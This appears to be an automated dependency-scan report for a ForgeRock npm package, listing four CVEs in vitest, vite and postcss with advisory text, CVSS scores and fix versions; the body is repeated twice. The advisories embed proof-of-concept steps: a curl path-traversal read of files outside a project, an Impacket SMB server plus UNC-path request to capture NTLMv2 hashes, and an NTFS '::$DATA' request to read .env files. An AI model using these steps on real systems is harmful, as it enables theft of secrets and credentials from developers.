Vulnerable Library - @forgerock/interface-mapping-validator-0.0.0.tgz
Path to vulnerable library: /package.json
Found in HEAD commit: 35816b45259e869a62ac8de8673e69df777330ef
Vulnerabilities
| Vulnerability |
Severity |
 CVSS |
Dependency |
Type |
Fixed in (@forgerock/interface-mapping-validator version) |
Remediation Possible** |
| CVE-2026-47429 |
 Critical |
9.8 |
vitest-3.2.4.tgz |
Transitive |
N/A* |
❌ |
| CVE-2026-53632 |
 High |
8.3 |
vite-7.3.2.tgz |
Transitive |
N/A* |
❌ |
| CVE-2026-53571 |
High |
7.5 |
vite-7.3.2.tgz |
Transitive |
N/A* |
❌ |
| CVE-2026-41305 |
 Medium |
6.1 |
postcss-8.5.6.tgz |
Transitive |
N/A* |
❌ |
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
CVE-2026-47429
Vulnerable Library - vitest-3.2.4.tgz
Next generation testing framework powered by Vite
Library home page: https://registry.npmjs.org/vitest/-/vitest-3.2.4.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- @forgerock/interface-mapping-validator-0.0.0.tgz (Root Library)
- ❌ vitest-3.2.4.tgz (Vulnerable Library)
Found in HEAD commit: 35816b45259e869a62ac8de8673e69df777330ef
Found in base branch: main
Vulnerability Details
Summary Arbitrary file can be read on Windows when Vitest UI server is listening, especially when exposed to the network. Impact Only users that match either of the following conditions are affected: - explicitly exposes the Vitest UI server to the network (using "--api.host" or ""api.host" config option" (https://vitest.dev/config/api.html)) - running the Vitest UI or Browser Mode on Windows Details The API handler for "/vitest_attachment" uses the deprecated "isFileServingAllowed" incorrectly. https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/ui/node/index.ts#L77 The function expects the passed value to use "cleanUrl" after the check before file system related operation. Because of this, it is possible to bypass the check by "?..". This is not possible on Linux as Linux errors if a directory named "?" does not exist. A similar problem exists in other places as well. - https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/vitest/src/api/setup.ts#L103-L105 - https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/vitest/src/api/setup.ts#L119-L121 - https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/browser/src/node/commands/fs.ts#L10-L11 - https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/browser/src/node/plugin.ts#L194-L196 - https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/browser/src/node/rpc.ts#L115-L121 That said, this "isFileServingAllowed" check does not actually prevent the API to be abused. Since the API has rerun feature and file write feature, it's possible to run arbitrary script by writing a script as a test file using "saveTestFile" and running it using "rerun". This means exposing the API / Vitest UI is equivalent to giving script execution access. On the browser mode side, there're "readFile" / "writeFile" / "saveSnapshotFile". So exposing the browser mode is equivalent to giving file read / write access. PoC 1. Run Vitest UI 2. Get the API token by "curl http://localhost:51204/vitest/" 3. Run "curl "http://localhost:51204/vitest_attachment?path=C:\path\to\project\?\..\..\secret.txt&contentType=text/plain&token=$TOKEN"" (TOKEN is the API token) 4. curl shows the content of "secret.txt" that is outside the project directory Mitigations Vitest now ships two configuration flags, ""allowWrite"" (https://vitest.dev/config/api.html#api-allowwrite) and ""allowExec"" (https://vitest.dev/config/api.html#api-allowexec), that gate the privileged operations exploited by this vulnerability. Both are disabled by default whenever the API server is bound to a non-"localhost" host, ensuring that exposing the server to the network no longer implicitly grants write or execute capabilities to remote clients. When these flags are disabled, the UI also enters a read-only mode: in-browser code editing and test file execution are turned off, removing the attack surface that allowed remote code execution. Many Browser Mode features are also disabled, like attachments, artifacts or snapshots. See ""browser.api"" (https://vitest.dev/config/browser/api.html#api-allowwrite). Users who require the full interactive UI on a networked host must explicitly opt in by setting "allowWrite" and/or "allowExec" to "true".
Publish Date: 2026-06-08
URL: CVE-2026-47429
CVSS 3 Score Details (9.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-5xrq-8626-4rwp
Release Date: 2026-06-01
Fix Resolution: vitest - 4.1.0,vitest - 3.2.6
CVE-2026-53632
Vulnerable Library - vite-7.3.2.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-7.3.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- @forgerock/interface-mapping-validator-0.0.0.tgz (Root Library)
- vitest-3.2.4.tgz
- ❌ vite-7.3.2.tgz (Vulnerable Library)
Found in HEAD commit: 35816b45259e869a62ac8de8673e69df777330ef
Found in base branch: main
Vulnerability Details
Summary The "launch-editor" NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking. Impact If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the "launch-editor": - using Windows - NTLM is not disabled ("it is recommended to disable" (https://techcommunity.microsoft.com/blog/windows-itpro-blog/advancing-windows-security-disabling-ntlm-by-default/4489526), while it's still enabled by default) - the user accesses the attackers website that sends request to a middleware using "launch-editor" - the server that has the middleware using "launch-editor" is running - the attacker knows the URL for that server and the middleware This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems. Details "launch-editor" accepts file paths without validating or restricting Windows UNC paths such as: \attacker-host\share On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur. If an attacker controls the SMB server referenced by the UNC path the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password. The attacker could target a developer that uses a development server using "launch-editor" to develop code locally, send them a link and grab their NTLMv2 hash. PoC From the attacker side, we will setup an SMB server. I personally used "Impacket's smbserver.py" (https://github.com/fortra/impacket/blob/master/examples/smbserver.py), but you could use something like "Responder" (https://github.com/lgandx/Responder) for this as well. For keeping it simple, we will use "smbserver.py" here. First, let's create a directory to serve as an SMB share. mkdir /tmp/data echo "Hello world" > /tmp/data/test.txt Then, start the SMB server. $ sudo smbserver.py -smb2support -debug share /tmp/data Now, run any project that uses the launch-editor package. I have setup a simple "Hello world" project that uses Vite to do this. Then run the project locally ("vite"). Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use "curl" to achieve the same. curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt' Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of "smbserver.py" and see the NTLMv2 hash coming in. 
Publish Date: 2026-06-15
URL: CVE-2026-53632
CVSS 3 Score Details (8.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-v6wh-96g9-6wx3
Release Date: 2026-06-15
Fix Resolution: vite-plus - 0.1.24,vite - 6.4.3,launch-editor - 2.14.1,vite - 8.0.16,vite - 7.3.5
CVE-2026-53571
Vulnerable Library - vite-7.3.2.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-7.3.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- @forgerock/interface-mapping-validator-0.0.0.tgz (Root Library)
- vitest-3.2.4.tgz
- ❌ vite-7.3.2.tgz (Vulnerable Library)
Found in HEAD commit: 35816b45259e869a62ac8de8673e69df777330ef
Found in base branch: main
Vulnerability Details
Summary The contents of files that are specified by ""server.fs.deny"" (https://vite.dev/config/server-options#server-fs-deny) can be returned to the browser on Windows. Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using "--host" or ""server.host" config option" (https://vitejs.dev/config/server-options.html#server-host)) - the sensitive file exists in the allowed directories specified by ""server.fs.allow"" (https://vite.dev/config/server-options#server-fs-allow) - either of: - the sensitive file exists in an NTFS volume - the dev server is running on Windows and the sensitive file exists in a volume that 8.3 short name generation is enabled (it is enabled by default on system volumes) Details Vite’s dev server denies direct access to sensitive files through "server.fs.deny", including entries such as ".env", ".env.", and ".{crt,pem}". However, on Windows, the deny logic does not correctly normalize NTFS ADS path forms before access checks are applied. Because of this, requests such as "/.env::$DATA?raw" are treated as allowed paths, while Windows resolves them to the original file's default data stream. Similar to that, Windows allows accessing a file using a different name with the 8.3 short name compatibility feature. Vite did not reject accessing files via them. PoC $ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev Access via browser at "http://localhost:5173/.env::$DATA?raw" 
Example expected result: - "/.env::$DATA?raw" returns the contents of ".env" - "/tls.pem::$DATA?raw" returns the contents of "tls.pem"
Publish Date: 2026-06-15
URL: CVE-2026-53571
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-fx2h-pf6j-xcff
Release Date: 2026-06-15
Fix Resolution: vite - 6.4.3,vite - 7.3.5,vite - 8.0.16,vite-plus - 0.1.24
CVE-2026-41305
Vulnerable Library - postcss-8.5.6.tgz
Tool for transforming styles with JS plugins
Library home page: https://registry.npmjs.org/postcss/-/postcss-8.5.6.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
- @forgerock/interface-mapping-validator-0.0.0.tgz (Root Library)
- vitest-3.2.4.tgz
- vite-7.3.2.tgz
- ❌ postcss-8.5.6.tgz (Vulnerable Library)
Found in HEAD commit: 35816b45259e869a62ac8de8673e69df777330ef
Found in base branch: main
Vulnerability Details
PostCSS takes a CSS file and provides an API to analyze and modify its rules by transforming the rules into an Abstract Syntax Tree. Versions prior to 8.5.10 do not escape "</style>" sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML "<style>" tags, "</style>" in CSS values breaks out of the style context, enabling XSS. Version 8.5.10 fixes the issue.
Publish Date: 2026-04-24
URL: CVE-2026-41305
CVSS 3 Score Details (6.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-qx2v-qp2m-jg93
Release Date: 2026-04-24
Fix Resolution: postcss - 8.5.10,https://github.com/postcss/postcss.git - 8.5.10
Path to vulnerable library: /package.json
Found in HEAD commit: 35816b45259e869a62ac8de8673e69df777330ef
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
Vulnerable Library - vitest-3.2.4.tgz
Next generation testing framework powered by Vite
Library home page: https://registry.npmjs.org/vitest/-/vitest-3.2.4.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 35816b45259e869a62ac8de8673e69df777330ef
Found in base branch: main
Vulnerability Details
Summary Arbitrary file can be read on Windows when Vitest UI server is listening, especially when exposed to the network. Impact Only users that match either of the following conditions are affected: - explicitly exposes the Vitest UI server to the network (using "--api.host" or ""api.host" config option" (https://vitest.dev/config/api.html)) - running the Vitest UI or Browser Mode on Windows Details The API handler for "/vitest_attachment" uses the deprecated "isFileServingAllowed" incorrectly. https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/ui/node/index.ts#L77 The function expects the passed value to use "cleanUrl" after the check before file system related operation. Because of this, it is possible to bypass the check by "?..". This is not possible on Linux as Linux errors if a directory named "?" does not exist. A similar problem exists in other places as well. - https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/vitest/src/api/setup.ts#L103-L105 - https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/vitest/src/api/setup.ts#L119-L121 - https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/browser/src/node/commands/fs.ts#L10-L11 - https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/browser/src/node/plugin.ts#L194-L196 - https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/browser/src/node/rpc.ts#L115-L121 That said, this "isFileServingAllowed" check does not actually prevent the API to be abused. Since the API has rerun feature and file write feature, it's possible to run arbitrary script by writing a script as a test file using "saveTestFile" and running it using "rerun". This means exposing the API / Vitest UI is equivalent to giving script execution access. On the browser mode side, there're "readFile" / "writeFile" / "saveSnapshotFile". So exposing the browser mode is equivalent to giving file read / write access. PoC 1. Run Vitest UI 2. Get the API token by "curl http://localhost:51204/vitest/" 3. Run "curl "http://localhost:51204/vitest_attachment?path=C:\path\to\project\?\..\..\secret.txt&contentType=text/plain&token=$TOKEN"" (TOKEN is the API token) 4. curl shows the content of "secret.txt" that is outside the project directory Mitigations Vitest now ships two configuration flags, ""allowWrite"" (https://vitest.dev/config/api.html#api-allowwrite) and ""allowExec"" (https://vitest.dev/config/api.html#api-allowexec), that gate the privileged operations exploited by this vulnerability. Both are disabled by default whenever the API server is bound to a non-"localhost" host, ensuring that exposing the server to the network no longer implicitly grants write or execute capabilities to remote clients. When these flags are disabled, the UI also enters a read-only mode: in-browser code editing and test file execution are turned off, removing the attack surface that allowed remote code execution. Many Browser Mode features are also disabled, like attachments, artifacts or snapshots. See ""browser.api"" (https://vitest.dev/config/browser/api.html#api-allowwrite). Users who require the full interactive UI on a networked host must explicitly opt in by setting "allowWrite" and/or "allowExec" to "true".
Publish Date: 2026-06-08
URL: CVE-2026-47429
CVSS 3 Score Details (9.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-5xrq-8626-4rwp
Release Date: 2026-06-01
Fix Resolution: vitest - 4.1.0,vitest - 3.2.6
Vulnerable Library - vite-7.3.2.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-7.3.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 35816b45259e869a62ac8de8673e69df777330ef
Found in base branch: main
Vulnerability Details
Summary The "launch-editor" NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking. Impact If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the "launch-editor": - using Windows - NTLM is not disabled ("it is recommended to disable" (https://techcommunity.microsoft.com/blog/windows-itpro-blog/advancing-windows-security-disabling-ntlm-by-default/4489526), while it's still enabled by default) - the user accesses the attackers website that sends request to a middleware using "launch-editor" - the server that has the middleware using "launch-editor" is running - the attacker knows the URL for that server and the middleware This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems. Details "launch-editor" accepts file paths without validating or restricting Windows UNC paths such as: \attacker-host\share On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur. If an attacker controls the SMB server referenced by the UNC path the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password. The attacker could target a developer that uses a development server using "launch-editor" to develop code locally, send them a link and grab their NTLMv2 hash. PoC From the attacker side, we will setup an SMB server. I personally used "Impacket's smbserver.py" (https://github.com/fortra/impacket/blob/master/examples/smbserver.py), but you could use something like "Responder" (https://github.com/lgandx/Responder) for this as well. For keeping it simple, we will use "smbserver.py" here. First, let's create a directory to serve as an SMB share. mkdir /tmp/data echo "Hello world" > /tmp/data/test.txt Then, start the SMB server. $ sudo smbserver.py -smb2support -debug share /tmp/data Now, run any project that uses the launch-editor package. I have setup a simple "Hello world" project that uses Vite to do this. Then run the project locally ("vite"). Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use "curl" to achieve the same. curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt' Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of "smbserver.py" and see the NTLMv2 hash coming in.
Publish Date: 2026-06-15
URL: CVE-2026-53632
CVSS 3 Score Details (8.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-v6wh-96g9-6wx3
Release Date: 2026-06-15
Fix Resolution: vite-plus - 0.1.24,vite - 6.4.3,launch-editor - 2.14.1,vite - 8.0.16,vite - 7.3.5
Vulnerable Library - vite-7.3.2.tgz
Native-ESM powered web dev build tool
Library home page: https://registry.npmjs.org/vite/-/vite-7.3.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 35816b45259e869a62ac8de8673e69df777330ef
Found in base branch: main
Vulnerability Details
Summary The contents of files that are specified by ""server.fs.deny"" (https://vite.dev/config/server-options#server-fs-deny) can be returned to the browser on Windows. Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using "--host" or ""server.host" config option" (https://vitejs.dev/config/server-options.html#server-host)) - the sensitive file exists in the allowed directories specified by ""server.fs.allow"" (https://vite.dev/config/server-options#server-fs-allow) - either of: - the sensitive file exists in an NTFS volume - the dev server is running on Windows and the sensitive file exists in a volume that 8.3 short name generation is enabled (it is enabled by default on system volumes) Details Vite’s dev server denies direct access to sensitive files through "server.fs.deny", including entries such as ".env", ".env.", and ".{crt,pem}". However, on Windows, the deny logic does not correctly normalize NTFS ADS path forms before access checks are applied. Because of this, requests such as "/.env::$DATA?raw" are treated as allowed paths, while Windows resolves them to the original file's default data stream. Similar to that, Windows allows accessing a file using a different name with the 8.3 short name compatibility feature. Vite did not reject accessing files via them. PoC $ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev Access via browser at "http://localhost:5173/.env::$DATA?raw"
Example expected result: - "/.env::$DATA?raw" returns the contents of ".env" - "/tls.pem::$DATA?raw" returns the contents of "tls.pem"
Publish Date: 2026-06-15
URL: CVE-2026-53571
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-fx2h-pf6j-xcff
Release Date: 2026-06-15
Fix Resolution: vite - 6.4.3,vite - 7.3.5,vite - 8.0.16,vite-plus - 0.1.24
Vulnerable Library - postcss-8.5.6.tgz
Tool for transforming styles with JS plugins
Library home page: https://registry.npmjs.org/postcss/-/postcss-8.5.6.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 35816b45259e869a62ac8de8673e69df777330ef
Found in base branch: main
Vulnerability Details
PostCSS takes a CSS file and provides an API to analyze and modify its rules by transforming the rules into an Abstract Syntax Tree. Versions prior to 8.5.10 do not escape "</style>" sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML "<style>" tags, "</style>" in CSS values breaks out of the style context, enabling XSS. Version 8.5.10 fixes the issue.
Publish Date: 2026-04-24
URL: CVE-2026-41305
CVSS 3 Score Details (6.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-qx2v-qp2m-jg93
Release Date: 2026-04-24
Fix Resolution: postcss - 8.5.10,https://github.com/postcss/postcss.git - 8.5.10